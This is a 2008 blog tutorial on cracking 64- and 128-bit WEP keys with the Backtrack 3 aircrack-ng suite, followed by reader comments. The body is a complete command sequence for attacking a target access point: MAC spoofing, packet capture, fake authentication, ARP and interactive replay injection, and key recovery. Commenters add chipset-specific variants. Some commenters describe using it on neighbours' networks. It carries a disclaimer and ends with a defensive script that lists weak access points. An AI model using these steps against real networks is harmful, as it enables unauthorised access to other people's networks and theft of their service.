Aug 19, 2008

Standard Disclaimer: This article is provided for informational purposes only. thew0rd.com and its affiliates accept no liability for providing this information. Please only use to test configurations on your own equipment. Accessing WIFI networks that do not belong to you is ILLEGAL.

This article will explain how to crack 64-bit and 128-bit WEP on many WIFI access points and routers using Backtrack, a live Linux distribution. Your mileage may vary. The basic idea is that we want to connect to an access point that uses WEP encryption, but we do not know the key. We will attack the wifi router, making it generate packets for our cracking effort, and finally crack the WEP key. I have tested this technique on an IBM Thinkpad x60 and an Acer 5672, and the WIFI chipsets in those machines work for sure.

Requirements:

I will assume that you have downloaded and booted into Backtrack 3. If you haven’t figured that part out, you probably shouldn’t be trying to crack WEP keys. Once Backtrack is loaded, open a shell and do the following:

Preparing The WIFI Card

First we must enable “Monitor Mode” on the wifi card. If using the Intel® PRO/Wireless 3945ABG chipset issue the following commands:

modprobe -r iwl3945

modprobe ipwraw
The above commands swap in a driver that supports monitor mode for the wireless chipset in your computer. Next we must stop your WIFI card:

iwconfig
Take note of your wireless adapter’s interface name. Then stop the adapter by issuing:

airmon-ng stop [device]
Then:

ifconfig [interface] down
Now we must change the MAC address of the adapter:

macchanger --mac 00:11:22:33:44:66 [device]
It's now time to start the card in monitor mode by doing:

airmon-ng start [device]

Attacking The Target

It is now time to locate a suitable WEP enabled network to work with:

airodump-ng [device]

Be sure to note the MAC address (BSSID), channel (CH) and name (ESSID) of the target network. Now we must start collecting data from the WIFI access point for the attack:

airodump-ng -c [channel] -w [network.out] --bssid [bssid] [device]

The above command writes the collected data to files prefixed network.out; the capture file (network.out-01.cap) will be fed into aircrack-ng when we are ready to crack the WEP key.

Open another shell and leave the previous command running. Now we need to generate some fake packets to the access point to speed up the data output. First, test the access point by performing a fake authentication with the following command:

aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]

If this command is successful, we can now make the target network generate many packets so that we can crack the key. Type:

aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]

This will force the access point to send out a bunch of packets which we can then use to crack the WEP key. Check your airodump-ng shell and you should see the “#Data” column filling up with packets.

After about 10,000-20,000 data packets you can begin cracking the WEP key. If there are no other hosts on the target access point generating packets, you can try:

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]

Once you have enough packets, begin the crack:

aircrack-ng -n 128 -b [bssid] [filename]-01.cap

The “-n 128” signifies a 128-bit WEP key. If cracking fails, try a 64-bit key by changing -n 128 to -n 64.

Once the crack is successful you will be left with the KEY! Remove the colons (:) from the output and there is your key. So there you have it.

You can use these techniques to demonstrate to others why using WEP is a bad idea. I suggest you use WPA2 encryption on your wireless networks. Good luck!
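To turn the airodump-ng step into an audit of your own networks, here is an added example (my code, not from the original post) that parses the CSV airodump-ng -w writes next to its .cap file and lists every access point still on WEP or with no encryption, together with the IV count airodump-ng has seen for each. It assumes the standard airodump-ng CSV layout (AP table, blank line, station table); the sample data is constructed.

```python
"""Added example (not from the original post): find legacy WEP/open APs in an
airodump-ng CSV (network.out-01.csv in the tutorial's naming) so they can be
retired. Assumes airodump-ng's two-section CSV layout with a 'Privacy' column."""
import csv
import io
from dataclasses import dataclass
from typing import List

# Constructed sample in airodump-ng's CSV layout; every value is made up.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:21:21:21:21:21, 2008-08-19 10:00:01, 2008-08-19 10:12:40,  6,  54, WEP , WEP, OPN, -41,     1200,    18350,   0.  0.  0.  0,   7, oldnet, 
00:1A:2B:3C:4D:5E, 2008-08-19 10:00:02, 2008-08-19 10:12:41, 11,  54, WPA2, CCMP, PSK, -60,      800,        0,   0.  0.  0.  0,   8, homewpa2, 
00:DE:AD:BE:EF:01, 2008-08-19 10:00:05, 2008-08-19 10:12:39,  1,  11, OPN , , , -75,      300,        0,   0.  0.  0.  0,   5, guest, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:11:22:33:44:66, 2008-08-19 10:01:00, 2008-08-19 10:12:40, -30,     9000, 00:21:21:21:21:21, 
"""


@dataclass
class WeakAP:
    bssid: str
    essid: str
    channel: int
    privacy: str   # "WEP" or "OPN", as airodump-ng reports it
    ivs: int       # '# IV' column: unique IVs airodump-ng has seen for this BSSID


def _ap_section(text: str) -> List[List[str]]:
    """Return the AP table rows: everything before the first blank line.
    airodump-ng does not quote fields, so an ESSID containing a comma would
    need column counting from the right; that case is not handled here."""
    head = text.split("\n\n", 1)[0]
    rows = list(csv.reader(io.StringIO(head), skipinitialspace=True))
    return [[c.strip() for c in r] for r in rows if r]


def weak_access_points(text: str) -> List[WeakAP]:
    """List APs whose Privacy column shows WEP or OPN (no encryption)."""
    rows = _ap_section(text)
    header, body = rows[0], rows[1:]
    col = {name: i for i, name in enumerate(header)}  # index columns by name
    found = []
    for r in body:
        privacy = r[col["Privacy"]]
        if "WEP" in privacy or privacy == "OPN":
            found.append(WeakAP(
                bssid=r[col["BSSID"]],
                essid=r[col["ESSID"]],
                channel=int(r[col["channel"]]),
                privacy="WEP" if "WEP" in privacy else "OPN",
                ivs=int(r[col["# IV"]]),
            ))
    return found


if __name__ == "__main__":
    for ap in weak_access_points(SAMPLE_CSV):
        print(f"{ap.bssid}  ch {ap.channel:2d}  {ap.privacy:4s}  IVs={ap.ivs:6d}  {ap.essid}")
```

Point it at a real file with open("network.out-01.csv").read() in place of SAMPLE_CSV; anything it lists is an AP that should be moved to WPA2.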

  87 Responses to “Tutorial: Cracking WEP Using Backtrack 3”

  1. Thanks Maz! You’re a lifesaver. I spent a while trying to do this with russix and I couldn’t get it. (Crazy mother-in-law is too cheap to buy internet, she moved, and her new place only has encrypted signals…luckily WEP)

  2. or you could just buy your web access and not be fucking people over for bandwidth etc.

    • just think how many people will be doing this on their own access point like me; i can't get back on mine so my mate who works for the military suggested i use this to get back on my network, so i suggest you shut up and leave the shitty comments to yourself.
      if you don't have anything good to say don't say it.

  3. Good tut. Next you might want to share with your readers about packet injection and Kismet for sniffing. I don’t know if they bundle Kismet with BT3 now but I know it was in BT2. Thanks

  4. There is no macconfig?
    macconfig: command not found

  5. @Registered99 Thanks for pointing out the mistake, the actual command is macchanger and I’m updating the post as I write this. Good luck!

  6. Thanks a lot. I don’t really even plan on using this, but it was very informative and clear. Thanks for the effort.

  7. I personally do not worry if someone hacks into my router to go online. What worries me is when the intentions go further: breaking into my desktop or using my connection to do bad things, which would get me a surprise knock on the door by the FBI. This is a darn good reason I remain connected with troublesome hard wiring or stick to the old router b version.

  8. just wondering what are your thoughts on hiding/not broadcasting the SSID…decently secure or no?

  9. @justgeig if there are active clients on an AP with a hidden SSID, you can usually see it when running airodump-ng by comparing the MAC of the hidden AP with the MAC on packet captures. So generally, it doesn’t offer much more security. Might just be a speed bump in some situations.

  10. aircrack-ng also has the PTW algorithm attack, which needs far less IVs to successfully decrypt a WEP key. You can invoke it using the ‘-z’ switch with aircrack-ng. I’ve cracked a 128-bit WEP key with only about 40000 IVs.

  11. I have done exactly as you told; my wifi chipset is Intel® PRO/Wireless 3945ABG.

    The problem is, after I use

    airplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]

    I get no packets from my access point. Then I use:

    aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]

    After this I get many packets, but like 50000 packets have only 1 IV.

    The access point I'm testing on is Dynalink_Datron.

    Hope someone can help

  12. Having trouble cracking wep key at my house. After performing this command aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device] the output for dest mac is ff:ff:ff:ff:ff:ff, but according to your tutorial the dest mac is the fake mac. So when I try to decrypt the packets it fails looking for keys and says try with 5000 IVs

  13. @jones hey, check out the following site for more information about Interactive Packet Replay: http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay

    Hopefully that will give you a little more background and assist you in your efforts. Good luck!

  14. great tutorial, scary

  15. “aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]”

    If you use interactive packet replay, wouldn’t you need to capture a lot more than just 20,000 packets in order to successfully attempt to crack? As far as I know what you’ll be capturing won’t be ARP packets, so the PTW method will not work for you. You’ll probably need to capture about 1,500,000 IVs before having a good chance of getting the key. Or am I mistaken?

  16. hey great tut, just one question: when I run the
    ifconfig down [wifi0] command I get an error something like interface not found, but when I run airmon-ng stop [device] it says interface is wifi0 so I'm pretty sure it's the right interface, btw interface and device are the same thing on my machine. oh and last thing, how do you get out of monitor mode?

  17. This tutorial is wonderful and worked for me!

    This line however needed the following changes to work for me.

    before:
    airodump-ng -c [channel] -w [network.out] –bssid [bssid] [device]

    after:
    airodump-ng -c [channel] -w [network.out] -–bssid [bssid] [device]

  18. great tutorial! what would need to be modified in the code to get it to work with an Atheros chipset?

    I can't quite figure it out

  19. for Atheros based chipsets use ath_pci in place of the numbers for the modprobe command. I also had to remove the -r to get it to load- BUT I have no idea what I’m doing yet

    Hope this helps someone

  20. this tutorial helped me a lot – it was the basis for me learning bt3. However some of the above posts did not work for me. I am using an Atheros chipset, and some things had to be changed. Hope this helps someone

    modprobe ath_pci

    modprobe ipwraw

    iwconfig

    airmon-ng stop ath0

    ifconfig wifi0 down

    macchanger --mac 00:11:22:33:44:66 wifi0

    airmon-ng start wifi0

    airodump-ng ath0
    gives available routers

    ******** cd /mnt/hda2/
    can do this to change the place to save the data
    airodump-ng -c 6 -w network.out --bssid 00:21:21:21:21:21 ath0
    collects shit

    aireplay-ng -1 0 -a 00:21:21:21:21:21 -h 00:11:22:33:44:66 -e "smokers suck" ath0   (an ESSID containing a space must be quoted)
    must play around with this to get it on the same channel
    should get:
    15:56:18 Association successful :-) (AID: 1)

    aireplay-ng -3 -b 00:21:21:21:21:21 -h 00:11:22:33:44:66 ath0

    aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:21:21:21:21:21 -h 00:11:22:33:44:66 ath0

    cd /mnt/hda2 <- Used this to re-locate to the directory with the file
    aircrack-ng -n 128 -b 00:21:21:21:21:21 network.out-01.cap

  21. can I use the wifi wireless network card that is in my laptop??

  22. Hi there

    I am new to Wifi and Linux. I have just been on Amazon to order books so I can read about Linux. They will be here in some days, but I can’t wait for some days.

    I'm trying this tutorial and I get an error:
    bt ~ # modprobe -r iwl4965
    bt ~ # modprobe ipwraw
    bt ~ # iwconfig
    lo no wireless extensions.

    eth0 no wireless extensions.

    bt ~ #

    If I run “modprobe -r iwl4965” then iwconfig can’t find my wireless adapter and I can’t find the interface name.

    What do I miss here or doing wrong?

    Thanks
    Nedad

  23. Take note of your wireless adapter’s interface name. Then stop the adapter by issuing:

    airmon-ng down [interface]

    what is the interface?
    all I can find is the device name.

    I get the error ‘host name lookup failure’

    I think this is why my #data is staying at zero and beacons is at like 30000

  24. I got it all working, I can't active attack, thanks for the great tutorial

  25. great tut. I also have a question, or 3 problems? 1.) well after this step: aireplay-ng -3 -b bssid -h 00:11:22:33:44:55 (device) there are a lot of read packets (100 000), but there are no ARP and ACK requests, and data is 0, or just a few, maybe 3 or 4 etc.
    so what's the problem?
    2) also, a lot of times this step doesn't work: aireplay-ng -10 -a bssid -h 00:11:22:33:44:55 -e essid (device); after that there is no Authentication successful and Association successful. 3. problem is next. after this aireplay-ng -3 -b bssid -h 00:11:22:33:44:55 (device), there are no ARP and ACKs so, with another laptop I tried to connect on the same secure network, and then ARP and ACK started.. but there is no data rising, only when I tried to connect with another laptop, then data rises, but when I stop, Data also stops. and after maybe 50 000 IVs I can't crack because that's not enough IVs. have you any solution, what can I do?

  26. one more thing- there is no problem with the wireless card, because I tried with 5 different!!

  27. how to increase the speed of injecting packets??
    the #data column doesn't rise very fast after injecting packets ... it would take around 4 hours to rise to about 10000 packets... how to make it rise faster??

    i am using an intel3495 card ….

  28. im getting a msg saying

    Fwrite(packet data) failed no more space on device
    fwrite(packet filter) failed no more space on device

    while collecting packets; after a while will it corrupt the packets collected???.. help, how do I relocate where data is sent??

  29. Nice job on the tutorial. I am having some trouble with the airmon-ng and airodump-ng. The apps start but are not finding any data and seem unstable. The first few times they did find some networks. But now they don’t find anything. I have the same Centrino wireless card cited in the tutorial. Kismet is working fine and finding many networks. Any help would be appreciated. Z.

  30. Nice tutorial. Have tried this before but my Laptop’s wireless card is not compatible. Will be purchasing a new card soon as this is a neat trick to show our clients.

  31. For all of you people asking about ifconfig, it’s not

    ifconfig down [interface]

    is

    ifconfig [interface] down

    have a good day ;)

  32. Great tut!
    But it doesn't stop scanning the wireless networks!
    Help!

  33. thx m8, great tutorial, although I had some problems with it; after a few hours playing with it I succeeded in hacking the WEP key of the desired network...once again many thx 2 u and browncardboard who wrote the version for my card, based on an Atheros chipset.

  34. Godafather
    to stop the scanning just press:

    Ctrl + C keys, that's for stopping any activity in that shell console window. and...

    and... Maz... Thanks for everything, I didn't try to type the modprobe commands. and still didn't..

  35. What Backtrack version specifically? 3 beta? or 3 final?

    I’m asking because I downloaded 3 final from the link you provided for CD version and when it boots it’s not live, its just a terminal, and it works fine until I have to open a new shell, which I can’t or don’t know how to do.

    So in essence I’m wondering if my download is corrupt or if I downloaded the wrong version.

  36. Hi everyone, I have a big question, I'm gonna buy a PCI Wireless Card (Belkin F5D900 Wireless G+ MIMO Desktop PCI Card) but the question is whether that card will be compatible with BackTrack3 for Aircracking. Has anyone used that kind of card before?

    That card is probably on an RT61 chipset. I'm not sure, thx for any answers.

  37. Hi all, I’m trying to inject packets to increase the data captures (to crack the WEP key), however the number of data never increases. I tried using the aireplay-ng command mentioned above with 3 APs (no MAC filtering) and it didn’t work.
    Thanks for your help

  38. This is a decent tutorial except that there are 2 typos in the listed commands to watch out for:
    “ifconfig down [interface]”
    should be:
    “ifconfig [interface] down”

    “airplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]”
    should be:
    “aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]”

    I am also having no luck with both methods of aireplay in getting packets.

  39. ok I understand the program and had no problem using it on my desktop but I'm having a huge issue with it on my laptop...I'm guessing that my Intel(R) Wireless Wifi Link 5100 chipset is not compatible unless there is something I can do to fix it. Can someone recommend an external wireless card that I can use in the express card slot on my laptop? if so I would appreciate it if you would drop me an email at generalj14@yahoo.com

  40. Huh. I don’t know what’s going on.

    I took this screenshot at a couple hundred thousand IV’s. I let the program run further, and was at several million IV’s and aircrack would still fail to deliver me my WEP key.

    I must say, I’m pretty damn impressed with WEP encryption if it takes several days and billions of packets for Aircrack to deliver me my key.

    http://i43.tinypic.com/vpjeb8.jpg

  41. I got stuck at:
    aireplay-ng -1 0 -a 00:00:00:00:00:00 -h 00:11:22:33:44:66 -e XXXXX ath0

    response:
    18:13:29 Waiting for beacon frame (BSSID: 00:00:00:00:00:00) on channel 1
    For the given BSSID “00:00:00:00:00:00”, there is an ESSID mismatch!
    Found ESSID “XXXX’X” vs. specified ESSID “XXXXX”
    Using the given one, double check it to be sure its correct!
    18:13:30 ath0 is on channel 1, but the AP uses channel 9

    any idea on what to do?

  42. Worked like a charm, took me less than a minute to crack my neighbors WEP, now I can cancel my Internet service. Hehehe…

  43. hi there.

    Thanks for this tutorial great job.
    However, it is a great tutorial; I have a few problems, and I would really appreciate it if someone could help me.

    First of all there are a few typing mistakes in the tutorial.
    It says ifconfig down interface but the correct one is ifconfig interface down.
    No, I'm not a smart ass, but it took me 2 hours to realize that's why I got the error message:)

    On the other hand, for some reason I cannot capture packets. I mean, I can see the traffic, but when I try to generate traffic there, basically nothing happens. Everything seems to be working fine but the packets don't seem to be growing. Can anyone help me regarding this?

    I have tried this command: aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]
    it is successful but when I try to use this: airplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]

    OOOOORRRRRR this

    aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]

    seems like the numbers are growing but not the IVs; data keeps counting painfully slowly, like 2 values up in an hour.

    It would be appreciated if someone could help me with what to do and how to do it.

    Cheers

    gomika

  44. hey people! you all are talking about BT3 wep hack but if after this step : aireplay-ng -3 -b bssid -h 00:11:22:33:44:55 (device) there is a lot of read packets (100 000), but there is no ARP and ACKs requests, and data is 0 you will not be able to hack any wep

    Any Answer????

  45. Maz said,

    11-16-2008 in 13:26:17 at 208.120.217.126 @guest
    …. You are obviously not going to crack WEP for any legitimate security purpose.

    ————————————————–

    What do you think most people do with this tutorial? 99% chance that people crack WEP for illegal purpose… I don’t understand your reasoning!

  46. everything good and helpful when the router has one name (demo). what should I do when the router has two names (one demo)? the aireplay-ng command does nothing if the router has two names!

  47. Hi commasbug,

    Can you help me with this ?
    I have no ARP. I am receiving many packets and data, but the ARP is still 0

    thx

  48. Nice tutorial, very helpful for a newb like me.
    Just got one problem/question. Upon cracking the key I get this:
    [01:01:01:01:01]
    How do I translate this to the actual WEP key?

  49. Hmm, disregard that comment. It’s right there…. Hehehe

  50. I have the same problem as above:

    Can you help me with this ?
    I have no ARP. I am receiving many packets and data, but the ARP is still 0

    thx

  51. I have an Intel Pro/Wireless 2915abg in a Dell Latitude D610 and when I type modprobe -r iwl2195 I get Module not found.

  52. running an Atheros ar5b91 in a Gateway T-6330u & BT3 live (CD) .. no adapter listed in BT’s wireless assistant.
    assume driver issue; considering BT4 beta or VM option... any suggestions? please & thank you!

  53. i like this

  54. This is great and all but people shouldn’t be screwing other people out of bandwidth like that!

  55. I am using an Atheros AR9285 802.11b/n Wifi Adapter - Windows 7.. the wireless security in my location is unsecured. how can I crack the password

    • Lenx, You could start by reading the article above. Next you could learn Linux. Thirdly, if there is “unsecured wireless security” in your location as you state above, there is nothing to crack, as it’s unsecured. Remember, it’s illegal to use someone’s wireless without their permission.

      I suggest you just give up and go do something else.

    • Actually I see you are in Kuala Lumpur, Malaysia. I’m not sure what the penalties are for stealing WIFI in Malaysia, but I could guess they are extreme.

  56. hello everyone, I have backtrack 4 and what I found is that you do not need to do some of the codes like putting it in monitor mode, and it does not have to be an Atheros or an Intel pro something something; it can be any wireless network adapter that you have. still, some codes do the same thing. all you need is to download backtrack 4 from a torrent or anywhere else and do what you have to do to make the evolution of hackers grow.

    • Gee, thanks for stealing my entire post word for word on your site. Fucking idiot can’t even get the images to display properly. Asshole.

  57. I am using an Atheros AR9285 Wireless Network Adapter, but it is not displayed when I ran airmon-ng! – there are no wifi interfaces
    PS: I have bt3 on CD, maybe on bt4 it will work normally...
    PPS: Excuse me for my English

  58. Is it possible for those of us that get to the final step that we are not receiving any data because the wireless router/AP we are accessing is actually not sending out any data? I.e. there is nobody connected to it?

    For example if you are trying to connect to a company and nobody is actually using the wifi at the time you try crack it?

  59. Hi,

    this is a very easy question for you i think, but i cannot find an answer for it.

    Is it possible to get my EEE PC 1005PE with Atheros ar9285 into monitor mode?

    Thanks
    West

  60. sir, I am using a Windows XP system with VirtualBox. I have a CD of bt-3 which I got with a Sky Dude router; now do I have to burn that CD or not? 2nd, I tried to load it but it stopped at two lines at startup, asking "shall", so now what do I have to do, and how will I get the router interface? it is USB 2.0 mini USB, so I have this name.
    I am new in this field and I don't have too much knowledge of computers, but I am learning through friends like you. thanks.
    I hope I will get a reply soon.

  61. thank uuuuuuuuuuuuuuuuu

  62. Dear sir

    please help me??

    Please send the software for spoonwep hack for WEP WPA WPA2
    and the server attach for web site software

    please send by email

    best regards
    Mohammad

  63. Here is an article that explains WEP cracking thoroughly:

    I hacked my secure wireless network here’s how it’s done – TECH_BLORGE_com
    http://tech.blorge.com/Structure:%20/2007/02/06/i-hacked-my-wireless-network/

    P/S: Maz, sorry for insulting.

  64. Hi,

    this is a very easy question for you i think, but i cannot find an answer for it.

    Is it possible to get my EEE PC 1005PE with Atheros ar9285 into monitor mode?

    Thanks
    West

  65. How to open a new shell console in Backtrack4 on VM Ware (on Windows XP)?
    Please help!!!

  66. the tutorial worked like a charm, perfect

  67. It amazes me how many people with a very minimal knowledge of Linux and the shell want to crack wep. Sigh.

  68. I lost my wifi adapter. how can I put it back?

    noel

  69. I lost my wifi adapter after I typed stop wlan0 and down wlan0. my comp now says no Intel supported adapter found in this computer. how to enable my adapter again. pls help.

    tks.

    noel

  70. thanks man ..
    I put an Alfa wireless adapter in and the program found it and did the scan in wireless for our neighbor
    but when I ran airodump for it, it didn't find any data and packets; what is the problem
